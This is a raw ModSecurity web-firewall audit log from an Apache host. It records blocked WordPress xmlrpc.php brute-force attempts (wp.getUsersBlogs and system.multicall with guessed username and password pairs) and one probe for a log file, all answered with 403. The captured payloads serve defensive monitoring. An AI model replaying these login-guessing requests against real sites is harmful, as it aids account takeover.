"/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (51+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114592317941 4422 (- - -) Stopwatch2: 1749114592317941 4422; combined=3350, p1=447, p2=2752, p3=0, p4=0, p5=89, sr=78, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6453da7e-Z-- --4f85e001-A-- [05/Jun/2025:16:10:58 +0700] aEFfIn-K7ToMdu-YSIJHGwAAAAA 103.236.140.4 37746 103.236.140.4 8181 --4f85e001-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --4f85e001-C-- wp.getUsersBlogs wakakur trustno1 --4f85e001-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f85e001-E-- --4f85e001-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (59+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114658838181 4399 (- - -) Stopwatch2: 1749114658838181 4399; combined=3202, p1=391, p2=2545, p3=0, p4=0, p5=144, sr=80, sw=122, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f85e001-Z-- --f7a57c46-A-- [05/Jun/2025:16:11:27 +0700] aEFfPyrHpfaS2Cuwh8X7AwAAAEs 103.236.140.4 39176 103.236.140.4 8181 --f7a57c46-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 50.6.205.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 50.6.205.26 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f7a57c46-C-- system.multicallmethodNamewp.getUsersBlogsparamseilderassedemo --f7a57c46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7a57c46-E-- --f7a57c46-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 50.6.205.26 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749114687593669 3885 (- - -) Stopwatch2: 1749114687593669 3885; combined=2833, p1=342, p2=2270, p3=0, p4=0, p5=122, sr=65, sw=99, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7a57c46-Z-- --60425863-A-- [05/Jun/2025:16:11:58 +0700] aEFfXlwdJdhOudw5hdzwmQAAAJM 103.236.140.4 40774 103.236.140.4 8181 --60425863-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --60425863-C-- wp.getUsersBlogs wakakur Passw0rd --60425863-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60425863-E-- --60425863-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (79+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114718299870 4463 (- - -) Stopwatch2: 1749114718299870 4463; combined=3395, p1=488, p2=2743, p3=0, p4=0, p5=96, sr=81, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60425863-Z-- --3099f528-A-- [05/Jun/2025:16:12:32 +0700] aEFfgCrHpfaS2Cuwh8X7zQAAAFQ 103.236.140.4 42462 103.236.140.4 8181 --3099f528-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 494 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3099f528-C-- system.multicallmethodNamewp.getUsersBlogsparamsafaqsaleemAfaqsaleem123!@# --3099f528-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3099f528-E-- --3099f528-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749114752762586 5400 (- - -) Stopwatch2: 1749114752762586 5400; combined=4083, p1=470, p2=3440, p3=0, p4=0, p5=102, sr=96, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3099f528-Z-- --72c2b07e-A-- [05/Jun/2025:16:12:58 +0700] aEFfmlwdJdhOudw5hdzxUgAAAIY 103.236.140.4 43718 103.236.140.4 8181 --72c2b07e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --72c2b07e-C-- wp.getUsersBlogs wakakur Admin001 --72c2b07e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72c2b07e-E-- --72c2b07e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114778187081 5523 (- - -) Stopwatch2: 1749114778187081 5523; combined=3864, p1=461, p2=3184, p3=0, p4=0, p5=124, sr=90, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72c2b07e-Z-- --fd9dec66-A-- [05/Jun/2025:16:13:58 +0700] aEFf1uth7G2xELALzPZMPQAAAMM 103.236.140.4 46608 103.236.140.4 8181 --fd9dec66-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --fd9dec66-C-- wp.getUsersBlogs wakakur Lovely --fd9dec66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd9dec66-E-- --fd9dec66-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (60+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114838108173 4785 (- - -) Stopwatch2: 1749114838108173 4785; combined=3682, p1=454, p2=3059, p3=0, p4=0, p5=100, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd9dec66-Z-- --bcd13c07-A-- [05/Jun/2025:16:14:43 +0700] aEFgA1wdJdhOudw5hdzy-QAAAIw 103.236.140.4 48818 103.236.140.4 8181 --bcd13c07-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 50.6.205.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 50.6.205.26 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bcd13c07-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix100 --bcd13c07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcd13c07-E-- --bcd13c07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 50.6.205.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749114883541813 6054 (- - -) Stopwatch2: 1749114883541813 6054; combined=4139, p1=467, p2=3479, p3=0, p4=0, p5=116, sr=73, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcd13c07-Z-- --36f24d30-A-- [05/Jun/2025:16:15:02 +0700] aEFgFlwdJdhOudw5hdzzNwAAAIk 103.236.140.4 49732 103.236.140.4 8181 --36f24d30-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --36f24d30-C-- wp.getUsersBlogs wakakur pw123 --36f24d30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36f24d30-E-- --36f24d30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (68+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114902004817 4072 (- - -) Stopwatch2: 1749114902004817 4072; combined=2916, p1=363, p2=2367, p3=0, p4=0, p5=108, sr=68, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36f24d30-Z-- --d393795f-A-- [05/Jun/2025:16:15:47 +0700] aEFgQ1wdJdhOudw5hdzzoAAAAIY 103.236.140.4 51938 103.236.140.4 8181 --d393795f-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173534763 --d393795f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d393795f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749114947261675 2184 (- - -) Stopwatch2: 1749114947261675 2184; combined=846, p1=362, p2=445, p3=0, p4=0, p5=39, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d393795f-Z-- --13c35c74-A-- [05/Jun/2025:16:16:02 +0700] aEFgUn-K7ToMdu-YSIJKzgAAABA 103.236.140.4 52734 103.236.140.4 8181 --13c35c74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --13c35c74-C-- wp.getUsersBlogs wakakur toos --13c35c74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13c35c74-E-- --13c35c74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749114962117814 4834 (- - -) Stopwatch2: 1749114962117814 4834; combined=3309, p1=439, p2=2712, p3=0, p4=0, p5=93, sr=87, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13c35c74-Z-- --5da86368-A-- [05/Jun/2025:16:16:25 +0700] aEFgaSrHpfaS2Cuwh8X-XwAAAE4 103.236.140.4 53922 103.236.140.4 8181 --5da86368-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.137 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.137 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5da86368-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehAdmin!@#123 --5da86368-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5da86368-E-- --5da86368-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.137 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749114985275909 4175 (- - -) Stopwatch2: 1749114985275909 4175; combined=2990, p1=463, p2=2395, p3=0, p4=0, p5=79, sr=119, sw=53, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5da86368-Z-- --cfbea802-A-- [05/Jun/2025:16:16:43 +0700] aEFge-th7G2xELALzPZOuQAAAMs 103.236.140.4 54864 103.236.140.4 8181 --cfbea802-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.18.232.22 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --cfbea802-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminProffus@1234 --cfbea802-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfbea802-E-- --cfbea802-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 185.18.232.22 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749115003876611 3479 (- - -) Stopwatch2: 1749115003876611 3479; combined=2585, p1=319, p2=2161, p3=0, p4=0, p5=62, sr=58, sw=43, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfbea802-Z-- --016dfe72-A-- [05/Jun/2025:16:17:03 +0700] aEFgj1wdJdhOudw5hdz0fwAAAJY 103.236.140.4 55810 103.236.140.4 8181 --016dfe72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --016dfe72-C-- wp.getUsersBlogs wakakur admin!@# --016dfe72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --016dfe72-E-- --016dfe72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115023415329 4947 (- - -) Stopwatch2: 1749115023415329 4947; combined=3833, p1=432, p2=3228, p3=0, p4=0, p5=102, sr=86, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --016dfe72-Z-- --28092472-A-- [05/Jun/2025:16:17:06 +0700] aEFgkn-K7ToMdu-YSIJLxwAAABI 103.236.140.4 55956 103.236.140.4 8181 --28092472-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --28092472-C-- wp.getUsersBlogs wakakur 1234%^&* --28092472-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28092472-E-- --28092472-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115026362552 4474 (- - -) Stopwatch2: 1749115026362552 4474; combined=3187, p1=379, p2=2655, p3=0, p4=0, p5=92, sr=78, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28092472-Z-- --62ccd32b-A-- [05/Jun/2025:16:18:04 +0700] aEFgzH-K7ToMdu-YSIJMpwAAAA8 103.236.140.4 58876 103.236.140.4 8181 --62ccd32b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --62ccd32b-C-- wp.getUsersBlogs wakakur BvtTest123 --62ccd32b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62ccd32b-E-- --62ccd32b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (78+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749115084414748 5395 (- - -) Stopwatch2: 1749115084414748 5395; combined=3707, p1=478, p2=3069, p3=0, p4=0, p5=95, sr=77, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
